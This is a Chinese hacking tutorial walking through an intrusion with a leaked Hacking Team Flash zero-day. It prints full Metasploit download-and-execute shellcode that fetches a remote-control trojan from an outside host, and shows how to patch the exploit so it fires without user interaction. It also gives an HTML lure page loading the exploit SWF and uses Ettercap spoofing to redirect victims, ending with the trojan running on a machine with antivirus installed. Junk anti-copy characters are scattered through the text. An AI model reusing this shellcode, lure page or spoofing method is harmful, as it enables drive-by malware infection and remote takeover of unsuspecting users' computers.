|
# m: T& m3 n8 H3 A 三、flash 0day之手工代码修改制作下载者实例入侵演示
% g1 c ?( i5 Q6 S3 |7 ~
8 G4 t2 B6 U6 V! ^5 g \9 t3 [# u% D- a/ F; Q# [
利用到的工具: : `2 B; Z5 r, b) q7 v
. P& ~ b+ ]0 r3 \- q
; ?7 o6 F7 D' |6 h5 \3 B Msf # v8 ?+ ]5 O& R0 T j% S6 I' h
$ J& F& H* \( h4 J; d z" S% o. {. |: T5 V" u9 o1 t
Ettercap
. w# _7 A: Z/ s! W+ p- ~
6 R% O/ G1 H& f/ V U+ }) {+ G6 D& ^0 }: L
Adobe Flash CS6
* K) T3 Y1 T1 Z8 z( H" M ], e5 Y
, M& D4 e8 s4 M7 N( P! v; N- J1 I* Z' a
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ; x+ A1 A. ~4 H; g& c( y. q2 Z5 g
" G: U6 E% n6 g7 m2 G+ ^" T" x( I' H' z
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
; g: Y3 B& x/ S; P. z
& d+ |0 l+ l4 `" y' y: C+ g' b
/ s: f5 e( ]3 e' w; O! w 如图: 0 C5 p7 M( @; i) o9 l6 W& U
. `# g1 N; F4 h- w
R% w) r$ I' I: W
m( X8 a7 p% l9 h. V5 t
; E x: \# X0 j5 r1 L1 _2 e
/ J$ q' P7 P# \6 h" S- {8 x, z
9 W* T q) v: c9 q* I; F
8 {8 P7 R& P# O2 p4 S, o l$ s9 g% q& c+ _
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
0 ^; F2 O M# W( x |$ y4 g 1 J- w5 j6 J @" D
7 C5 w/ g; m3 a! S9 ]1 w( U
# W* e' X) T3 ^( d) f, U: w9 F6 p
( _$ B; I, |# [; h
3 e; d% t3 u, V6 a5 Y2 _) q) I% _
6 ]. [7 K3 k1 b+ u! `5 f0 q
0 Y3 R' S' R' ]! R- X& k% z- {7 h Q3 A2 D& u( F6 _0 @
然后执行generate -t dword生成shellcode,如下: 9 l$ L, R9 d* U t$ U
0 y+ y0 H0 {( B6 W* v1 ]
3 P. L% _: h g. \% w
" w$ i8 d5 Y3 ~
( `$ }2 e( o& e+ m0 Z8 E1 R( H& N
复制代码到文本下便于我们一会编辑flash exp,如下: 5 B6 Z8 H4 }) u3 d% i. K1 m
# |9 @$ A, c2 Y4 |. C3 z
5 X# ?3 b3 i1 \+ O( P d 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ' u. `4 v& e" w1 |0 Y* B
, B8 G* {7 x, @; m
8 {! i, G9 h; y8 h' J1 b @, p 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ; k: U' c* j/ n% t: W
8 v; t0 H. L0 V+ c/ |
3 J! }0 L6 }! p" r3 D7 n* n& u9 p 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
1 ?: C% C# U+ R# F + ?+ q( A* Y5 O' g; y2 ~9 t( j
2 i, j4 U# c, ?7 S 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 2 [- O+ K7 B% }% K, c+ R2 n0 m! H
9 h% F% |' r# S: v) M
" P5 Z3 a) y+ t1 v2 J# c% n5 r( G6 }0 m
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
# z" L. {0 [/ W- k7 S
8 t. U, I5 ~8 w# m8 Q! V' H. Q& k3 t
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, . ?1 |$ J5 t8 J& N2 Y( ?& Q
# f1 h4 c: v9 }8 ^2 J( p4 Y3 A
5 B9 r J3 l; o( S( u& C" I 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
% Z# Q- }2 C0 m# w' O$ { * \$ \$ ?. R/ a- J8 j# E) _
, b% M' M) N, U% x- o+ c
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, . h9 [7 C& Q! e
. w0 z7 R) L9 C7 D
" M3 Z9 o& h: Q$ ~ 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, X* L/ K/ h5 [ ?4 F1 x
) ?" [: M8 R! \: O a& J, P, H6 I$ t g; e! Z1 f- i
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
* h( v# S" u& H/ I0 N
# ~8 F' D+ t( i) S
' Q3 Y2 x! I0 p) }+ K, J" d0 U 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
% m2 U# b$ N1 a) o' w5 W % P3 I5 O j w6 L/ Y' Z: L; f
$ }" W* E( W" q; Y
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
" _- ~3 i! H% f: M- `9 o # n0 c6 c4 b, V! O& }4 h* o
- R& v# A8 t# A/ ]' n0 N4 G( T 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ' a) y0 o3 e! ?/ R A% {2 V
/ y# ^& W7 b6 v* o v+ [2 h
. v7 a" k8 ]7 W5 p 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 7 f# ]% j8 f& R8 l9 C$ X8 I- i
( C& y% I; k+ H- A5 O
, `$ t5 I% E; n, y0 x' I; }1 a
" [6 ]' l) J, r0 ]. n& e$ R3 d # E+ [: {) c" i2 X' ?7 S
0 @" ] O" E( U5 N; }8 ] + d# Z# E9 @2 j& Y
. F' X1 L1 ^+ d5 O/ t( U
. [" S1 K/ J. u4 t- x6 H 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
4 O& V0 C/ R8 x3 ]5 @/ V
2 h1 O9 C9 Y3 Z% m% k! p: B7 [3 f! ^6 v
3 h; ~1 P0 [# z/ J2 @; _
" g7 A. C( S; R% j5 k3 s6 K
) d& P7 U9 L! T3 {% w u) w 先修改ShellWin32.as,部分源代码如图:
+ ]: J' H; p- L( R0 R$ W0 g3 D% W * ?8 z" ~% {4 F0 ~0 p% y
6 Y& ~* p! c0 ]( e8 G/ C0 u, }! r
0 @+ `. h+ p# s) b1 J * j: `: @9 }. c' a" h% B
1 n- a6 x" b2 e. E
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
3 z) ^- J( I8 V4 J1 u
4 L1 d+ q# } R: g- c5 R0 W) |1 p& t* L# c
) D8 Q8 n$ F6 V. T* Y$ n
7 v# a8 P& q& A" s5 X* M9 s+ Y' m
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
, E; h* ?: S& T/ V4 z: \4 J8 e5 z 7 X) Q8 ?+ l Q
" ?! Z# r9 |( _' P' Z4 p% f- h: T
* [( d. e; d. G* V9 }# |. U2 ?4 Y
p& c; C, W; v! f
. F" p N7 I! F5 L% ^ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
# S) V1 I. Y @5 h( O2 q ' a9 A( Q" P8 k$ Q4 {
6 F/ o d; w" O/ p L ( k5 b$ p! B3 O- x
0 m! w" I E* G- P* H4 b: N7 F- |! ?2 o
- v' |) f8 J! ^* @
7 A+ E7 l- W u6 j" D5 V5 ?, u0 {) `
* f7 l' [$ L1 t D
3 f9 V+ Q4 f# ^& X+ l/ k- f' J! Q9 M; o4 `6 e# P! q
然后点保存,下面我们来编译一下,打开 ; L8 P4 F3 S# ^6 f8 X. Q
8 W2 d& D0 ~' C) l k ]& Z
2 R6 S& ], J+ S) k3 x: q exp1.fla然后点文件-发布,看看编译没错误 D- U! X G( P w2 K: ], t
4 Q5 t$ `7 d( i+ [: r, C0 x
$ K/ }, \. |: k& r3 B7 I$ g
/ N% ~9 ~" K: f2 b' g; ]* k0 \. h6 { 5 ]) j5 \; X9 K, y
0 d E* _4 L6 M7 R
8 N; [. ?0 w- b- W5 o' n2 Q% n
8 o9 T- S' h) |) C
" X7 _8 o0 t& E& s9 N( D
/ h4 Y8 }8 {' u2 l
0 e$ |$ L: N- Z$ F" A, ^" R
% `9 g4 p8 b% W9 ]* r
! @9 R3 w0 K, X1 n: i$ c5 f1 _ # y7 Y* u7 y" F7 o1 x
2 M e; l! a: L. Q
然后我们把生成的 3 F& R, R7 l# P! G- ]1 l
: O! N: ?! F W. g7 n
/ v8 B/ R+ z K exp1.swf丢到kailinux 的/var/www/html下:
* o( h0 a2 z! ~2 u" D, ^4 C
: I5 w. \& I# O1 [) i! w) e2 f& M- e0 i8 J
然后把这段代码好好编辑一下
# U6 r2 b0 S2 \; B 4 P1 y8 ^: Z0 ^/ R2 g
2 c3 ?; p+ r3 t0 I" [5 U9 J& X 8 A% h9 F$ J8 I' W( r0 l4 ^
7 y7 I& a/ e* P h# X
' v0 U, T& g: A2 @( c4 w 4 j! n# A- L2 r" s9 x: i" A! Q
9 v- P4 d6 H, R
$ g$ l4 y9 [. S" Y; m! m* Q0 P
* T1 M: V* k& x7 K% ~2 P & d% W. M& I( Y% }4 ]
" Z. l9 I% j/ q0 w4 M S8 t9 {) Y2 ~4 T
& e* E" g0 V. b0 b9 Q9 u3 b9 ^
' F6 G1 N$ I5 k1 U8 G2 Z8 y4 P! b# F! K1 D' u
. |: J, y) c1 S; I8 s& P* S9 E8 V
5 S0 Q5 ]5 A' \5 m
! s; v: D8 E( z
3 u3 e9 i* |, A8 p4 z$ ^3 ] " p3 F8 a* K; Z9 m1 n: ]; O
+ A4 L( Q. X: {; L ?+ \, `
<!DOCTYPE html> 1 [$ h* s q' d+ P8 N; J
5 R9 [" p7 t+ G% o5 i& T) t4 w$ {/ Q# p* H, O
<html>
, {" W& d' K6 ^1 }! a6 ?0 g7 z. c! I 2 x/ O2 Y- {- L) W% Q# O
) l0 h4 z" U* n0 {; Y: J. a8 l <head>
9 A/ l0 I: t) J ' g" P+ Q/ x8 C8 Y) ?
G+ T$ @, I& l1 W6 ?1 D8 e$ L
<meta http-equiv="Content-Type" content="text/html;
& ? \* E; ^9 k8 z
# K+ F5 {) H8 u b9 `
- k; P! P; O: V# F6 P3 a. Q( u charset=utf-8"/> 0 {& c7 P, e8 f7 U5 u$ |. D- T3 D
& F1 g8 I, N& g# s: K4 i
) ^$ E/ ]" Q! i4 x4 r </head>
& o7 \+ s6 b8 G3 d # Q5 M9 E8 @ ~+ c6 @3 I
4 i* f/ c0 D- p
<body>
3 u7 f, r) K: [" A7 ^; N* b- r 8 C' \- j! A F" R K+ m
9 d/ s( M8 A2 O1 K W' g$ r <h2> Please wait, the requested page is loading...</h2> 8 V1 z. T/ Z8 p K8 O
4 x/ B' A; v. E$ F" i& Q' c
6 d; \2 k+ a+ Q/ w <br>
$ [, M5 P0 A- }; A6 n! E
# @- j. w' D5 d' ^7 Y
5 h* u2 D- c |7 R" [9 q <OBJECT
2 J6 \ u2 l: W2 F ' ]* m+ o3 }7 g1 P3 a+ h) s
; P: a. h, b7 Z
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie : F: U( k( _/ U2 ]6 F
' O9 a+ m4 d9 M4 h0 o" e6 \
# A! o) g- h. n+ _
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
: _$ {# X b% D. b
& k0 o. ?' [' R& w+ b
- ^; @! c7 K% Q( v- L$ I2 K, B </body> % j5 Y" q+ d S9 `& T! i8 E
& f w: m- A4 Y# a4 M8 r/ y* U
! e: T$ m( G- l" i <script> . K' W8 O% l, I- N1 I+ i4 X
/ ]: ^# }8 _; P4 p9 ]# O- Q
8 W7 o! Q( F8 l' S% M0 h/ C$ k
setTimeout(function () {
0 n5 S( h+ h" R& W9 p % G* r' r- f2 H3 r$ W
0 n! R) x3 Q* F0 J& R$ d 5 P1 L7 d) x$ B9 }* Q
* p3 E! \. F& [2 x# O$ b/ Z! `5 z# T
7 s/ a) O' M- V- ] window.location.reload();
# w: o6 I9 p* `7 s+ A2 [$ H
' H; v1 p; l6 p1 G Q0 g
+ d& B- \! [/ G0 b }, 10000); ! K% ~2 w5 Z9 N: p5 s, [7 [, v3 y
$ ^( d" B1 J2 g/ u, K4 n% r; m1 k1 P" |2 K3 M+ C" V
9 [3 Z$ S# `9 `' J. Z9 [
: [1 |+ V' H* ?! k
% J$ z2 e* O9 |3 K# V4 F# ~
</script> ' R, p6 F, ]/ S% ?: k8 y1 B' D" O8 G7 z
8 N: |* Z( i( f' G: I1 j* t) t+ j ?3 U& o ^* |! I
</html> # y- S9 L9 U+ y3 Q0 D
: D2 ]/ `; V: K) [# u1 _' ~ H3 y0 n2 V1 e4 s$ ~( j& |( w/ s, t* C8 y1 O+ w
: F% l. }- O) j1 v
1 e" s# ^% y- Q0 K+ y8 k6 F
1 [4 Q" b3 c `/ x4 L: H 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 6 G& @8 q4 \+ o- }4 {9 U- g
: V# s2 _1 U9 A/ S, o1 g# ?* R8 e6 H j" o; ], f
4 `; ^ C, |. l9 M1 D ! T2 ?, g" h9 v1 P$ ?
+ _: X1 A! n, o* u $ y- N0 \/ \+ ~3 H# `1 u
( O# R. B! W/ C; ^
7 _4 t! @5 L3 w- e( [
& a2 Q- m, o2 i; n& X$ J- _; R $ w+ @% S7 n* }1 ^$ q2 H
0 [- E7 A! H/ ]' P' j! A# V
$ \. c* r4 u% A7 k$ j. [
9 g& f( ?) j& f/ b- |0 t
& E6 C4 E- d/ `; t: c% q
) Q. `+ i& F( V+ D- z+ _$ E , ` |( q, I) M
2 X8 ~$ q" x% d: C
下面我们用ettercap欺骗如图:
) s' V& g& M7 {% ~3 q& E / w- Q8 Y/ O0 I1 c
8 M5 B! J8 N% a- \! L( |
7 s. p+ d4 b- U! {& E7 f% K
) n- O: Q* `) m( L7 I- b9 P* D5 [8 m( p) L
; R- T5 h" n8 v- ], [
5 \* Y+ e0 b/ H$ z1 T4 t7 k
0 j4 S: u0 P; j1 M 下面我们随便访问个网站看看:
+ v; [' V, i) k" ? B
4 V! {; h! {: V5 w4 m) ^4 D2 p/ r
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: + y1 v5 _/ g6 f6 t
~' g' C$ j9 T @7 o2 Y0 b
6 T, z# h% A H* ?
/ F$ X: D6 x1 d
9 a! B4 M7 P H. R/ R" u6 s8 M# j! J, ~/ n& t' ^
我们看另一台, ) l3 w% j& f* k
( p- t9 ?. d" }% N3 c
! u' X- `; U. w1 z! v; \8 U
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 # x" k Y* d; n# v9 G' M' a
|